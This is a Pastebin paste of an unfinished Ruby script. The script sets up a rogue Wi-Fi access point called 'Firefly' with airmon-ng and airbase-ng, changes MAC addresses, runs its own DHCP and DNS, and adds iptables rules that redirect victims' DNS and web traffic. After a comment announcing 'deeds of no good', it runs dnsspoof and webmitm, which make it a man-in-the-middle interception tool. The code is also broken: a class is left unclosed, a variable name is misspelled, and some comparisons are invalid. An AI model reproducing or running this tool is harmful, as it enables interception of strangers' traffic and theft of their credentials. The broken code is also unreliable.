API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 27th, 2017
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 9.09 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/ruby
  2. #capn-jack_mr_hai_signature_string
  3. # this is a work in progress, im going to eventuall make a complete handler for wireless router .
  4. # I started trying to make a WAP software in rub but after a while I started realizing that I shouldnt reinvent the wheel
  5. # i should just make a really good car. Im going to incorporate a bit of C and python also, the C to speed it up and the python
  6. #for some packet manipulation in the stream using scapy.
  7. #The configurtation options are all constants, i figured that instead of asking each time (since people generally have a
  8. #consistant setup) you set them in the code, the Class "packet_filter" is the filter (no really?!?!) i generally use nested ifs
  9. # for the hueristics but you can do whatever here
  10.  
  11. #install script
  12. #timed saves to pcap if ACTBAD, selective ports, most useful for tcp reconstruction
  13. require 'socket'
  14. require 'openssl'
  15. require 'packetfu'
  16. #find alternatives to avahi and network manager
  17. #maybe make a WAP connection script?
  18. # iw? ifconfig? both !
  19. #airodump to showcase the area, iwconfig to connect
  20. #dhclient to get an IP
  21.  
  22.  
  23. #ACL from ruby doc
  24. # have it be invoked as a response to snort
  25. #
  26.  
  27. #general config
  28. KEY = "qwertyuiopasdfghjklzxcvbnmqwerty"
  29. IV = "qwertyuiopasdfghjklzxcvbnmqwerty"
  30. $ACTBAD=true
  31. $VERBOSE = true
  32. LOGGING= true
  33. MONITOR="mon0"
  34. EXTIF="eth1"
  35. TUNNEL="at0"
  36. INTIF="wlan1"
  37. TTY="/dev/tty10"
  38. CHAN = "9"
  39. ESSID="Firefly"
  40. `alias wpas='sudo killall -9 wpa_supplicant'`
  41. `sudo killall -9 avahi-daemon `
  42. #DHCP config
  43. RANGE="192.168.1.2 192.168.1.254"
  44. SCOPE="192.168.1.0"
  45. GATEWAY="192.168.1.1"
  46. MASK="255.255.255.0"
  47. BROADCAST="192.168.1.255"
  48. DOMAIN="cerberusrouter.net"
  49. DNS1="208.67.222.222"
  50. DNS2="208.67.220.220"
  51.  
  52.  
  53.  
  54. #Handles encryption
  55. #example
  56. #   #preparing my balls for encryption
  57. #   balls = Encryption.new("balls")
  58. #   #encrypting my balls
  59. #   balls.encrypt_payload
  60. class Encryption
  61.     def initialize (string)
  62.         @string = string
  63.     end
  64.     #encrypts
  65.     def encrypt_payload
  66.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  67.         cipher.encrypt
  68.         cipher.key = WAPinit::KEY
  69.         cipher.iv = WAPinit::IV
  70.         cipher.update(@string) + cipher.final
  71.        
  72.     end
  73.     #decrypts
  74.     def decrypt_payload
  75.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  76.         cipher.decrypt
  77.         cipher.key = WAPinit::KEY
  78.         cipher.iv = WAPinit::IV
  79.         cipher.update(@string) + cipher.final
  80.     end
  81.    
  82. end
  83. class Http_server
  84.   def initialize(port, header, max_connect, host,)
  85.     @host = host #(insert php server self here)
  86.  
  87. #instances of this class start the show
  88. class WAPinit
  89. `/etc/init.d/networking restart`
  90. #file contents of the bind and DHCP servers and the interface file
  91. interfaces = <<INTERFACE
  92. #loopback interface
  93.     auto lo iface lo inet loopback
  94.  
  95.     # interface external network (internet), configured through dhcp
  96.     auto #{EXTIF}
  97.     iface #{EXTIF} inet dhcp
  98.  
  99.     #interface network 1
  100.     auto #{INTIF}
  101.     iface #{INTIF} inet static
  102.             address #{GATEWAWY}
  103.             netmask #{MASK}
  104.             network #{SCOPE}
  105.             broadcast #{BROADCAST}
  106.  
  107.  
  108.  
  109. INTERFACE
  110.  
  111. bind = <<BIND
  112. options {
  113.     directory "/var/cache/bind";
  114.    
  115.     forwarders {
  116.         #{GATEWAY};
  117.        
  118.     };
  119.  
  120.     auth-nxdomain no;    # conform to RFC1035
  121.     listen-on-v6 { any; };
  122. };
  123. BIND
  124.  
  125.  
  126. dhcp3 = <<DHCP
  127. ddns-update-style interim;                                  
  128. ignore client-updates;
  129.  
  130. subnet #{SCOPE} netmask #{MASK} {
  131.  
  132.         range #{RANGE};                  
  133.            option subnet-mask              #{MASK};    # Default subnet mask to be used by DHCP clients
  134.            option broadcast-address        #{BROADCAST};    # Default broadcast address to be used by DHCP clients
  135.            option routers                  #{GATEWAY};      # Default gateway to be used by DHCP clients
  136.            option domain-name              "#{DOMAIN}";
  137.            option domain-name-servers      #{DNS1}, #{DNS2};           # Default DNS to be used by DHCP clients
  138. }
  139. #         DHCP requests are not forwarded. Applies when there is more than one ethernet device and forwarding is configured.
  140. #       option ipforwarding off;
  141.  
  142.          default-lease-time 21600;                            # Amount of time in seconds that a client may keep the IP address
  143.         max-lease-time 43200;
  144.  
  145.         option time-offset              -18000;              # Eastern Standard Time
  146. #       option ntp-servers              192.168.1.1;         # Default NTP server to be used by DHCP clients
  147. DHCP
  148. printf "\033[00;31m[SYSTEM]\033[00m   TTY output Being Directed to \033[00;31m#{TTY}\033[00m\n"
  149. printf "\033[00;34m[NETWORK]\033[00m External Interface: \033[00;31m#{EXTIF}\033[00m\n"
  150. printf "\033[00;34m[NETWORK]\033[00m Monitor Interface:  \033[00;31m #{MONITOR}\033[00m\n"
  151. printf "\033[00;34m[NETWORK]\033[00m Internal Interface: \033[00;31m#{INTIF}\033[00m\n"
  152. printf "\033[00;34m[NETWORK]\033[00m Tunnnel Interface:  \033[00;31m #{TUNNEL}\033[00m\n"
  153. printf "\n\033[00;31m[SYSTEM]\033[00m Configuring Interfaces\n"
  154. printf "\033[00;35m===============================================================\033[00m\n"
  155. ifaces = File.open("/etc/network/interfaces", "w")
  156. ifaces.syswrite(interfaces)
  157. `route add -net -n #{SCOPE} netmask #{MASK} dev #{INTIF}`
  158. `route add -net -n 0.0.0.0 dev #{EXTIF}`
  159. printf `route`
  160.  
  161. printf "\033[00;35m===============================================================\033[00m\n"
  162. printf "\033[00;31m[SYSTEM]\033[00m Interfaces Configured\n"
  163.  
  164. if `ifconfig`.match(/mon[0-9]/) = true
  165.      printf "monitor mode previously enabled skipping"
  166.    elsif `ifconfig`.match(/at[0-9]/) = true
  167.      printf "WAP already active, skipping"
  168.    elsif `ifconfig`.match(/wlan[0-9]/) = true
  169. #     `sudo killall -9 NetworkManager`
  170.      `sudo killall -9 avahi-daemon`
  171.      `killall -9 wpa_supplicant`
  172.      `airmon-ng start #{INTIF} #{CHAN}`
  173.      `gnome-terminal -e airodump-ng #{MONITOR}`
  174.      `changemac #{EXTIF}`
  175.      `changemac #{INTIF}`
  176.      printf "\033[00;31m[SYSTEM]\033[00m Monitor Mode Enabled on #{INTIF}  \n"
  177.      printf "\033[00;31m[SYSTEM]\033[00mActivating Wireless Access Point \n"
  178.      `killall -9 wpa_supplicant`
  179.      pid = fork do
  180.        `airbase-ng -e #{ESSID} -v -v -c #{CHAN} -I 5000 #{MONITOR} 2>&1`
  181.      end
  182.     Process.detach(pid)
  183.    else printf "Something happened with the interfaces, please configure your system and plug in any devices"
  184.   end
  185. sleep 4
  186. `ifconfig #{TUNNEL} up`
  187. #begin the router-fu!
  188. `modprobe ip_tables`
  189. `modprobe iptable_filter`
  190. `modprobe ip_conntrack`
  191. `modprobe ip_conntrack_ftp`
  192. `modprobe ip_conntrack_irc`
  193. `modprobe iptable_nat`
  194. `modprobe ip_nat_ftp`
  195. `modprobe ip_nat_irc`
  196.  
  197. printf "\033[00;31m[SYSTEM]\033[00m Done loading modules\n"
  198. printf "\033[00;31m[SYSTEM]\033[00m Enabling DynamicAddr\n"
  199. `echo "1" > /proc/sys/net/ipv4/ip_dynaddr`
  200.  
  201. printf "\033[00;31m[SYSTEM]\033[00m Resetting IPTables Rules\n"
  202. `iptables --table nat --flush`
  203. `iptables --delete-chain`
  204. `iptables --flush`
  205. `iptables -P INPUT ACCEPT`
  206. `iptables -F INPUT `
  207. `iptables -P OUTPUT ACCEPT`
  208. `iptables -F OUTPUT `
  209. `iptables -P FORWARD DROP`
  210. `iptables -F FORWARD `
  211. `iptables -t nat -F`
  212.  
  213. printf "\n\033[00;31m[SYSTEM]\033[00m Configuring Routing Tables\n"
  214. printf "\033[00;35m===============================================================\033[00m\n"
  215.  
  216. `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -j ACCEPT`
  217. `iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -m state --state ESTABLISHED,RELATED -j ACCEPT`
  218. `iptables -A INPUT -i #{TUNNEL} -m state --state ESTABLISHED,RELATED -j ACCEPT`
  219. `iptables -A INPUT -i lo -s 0/0 -d 0/0 -j ACCEPT`
  220. `iptables -A POSTROUTING -t nat -o #{EXTIF} -j MASQUERADE`
  221. `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to #{GATEWAY}` #dns
  222. `iptables -t nat -A PREROUTING -i #{TUNNEL} -p tcp --dport 80 --j REDIRECT --to-ports 80`
  223.  
  224. `echo "1" > /proc/sys/net/ipv4/ip_forward`
  225. printf "\033[00;35m===============================================================\033[00m\n"
  226. printf "\033[00;31m[SYSTEM]\033[00m IPTables Configured\n"
  227. printf "\n\033[00;31m[SYSTEM]\033[00m Configuring DHCP\n"
  228. printf "\033[00;35m===============================================================\033[00m\n"
  229. `ifconfig at0 up`
  230. `ifconfig at0 #{GATEWAY} netmask #{MASK}`
  231. `ifconfig at0 mtu 1500`
  232. dhcpconf = File.open("/etc/dhcp3/dhcpd.conf", "w")
  233. dhcpconf.syswrite(dhcp3)
  234. `dhcpd3 #{TUNNEL}`
  235. printf "\033[00;35m===============================================================\033[00m\n"
  236. printf "\033[00;31m[SYSTEM]\033[00m DHCP Server Configured\n"
  237. printf "\n\033[00;31m[SYSTEM]\033[00m Configuring DNS\n"
  238. printf "\033[00;35m===============================================================\033[00m\n"
  239. dnsf = File.open("/etc/bind/named.conf.options", "w")
  240. dnsf.syswrite(bind)
  241. printf `/etc/init.d/bind9 restart`
  242. printf "\033[00;31m[SYSTEM]\033[00m DNS Caching Configured\n"
  243. printf "\033[00;35m===============================================================\033[00m\n"
  244. `notify-send "#{ESSID} - Wireless Access Point initialized"`
  245. end
  246.  
  247. #Starting the server
  248. WAPinit.new
  249.  
  250. # so far we have accomplished the task of initiating a WAP, starting DHCP, configuring the routing tables for
  251. #tranparency and configuring the interfaces.
  252.  
  253. #now we begin the deeds of no good
  254.  
  255. `dnsspoof -i #{TUNNEL}`
  256. sleep 1
  257. `webmitm -d -d -d`
  258. sleep 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!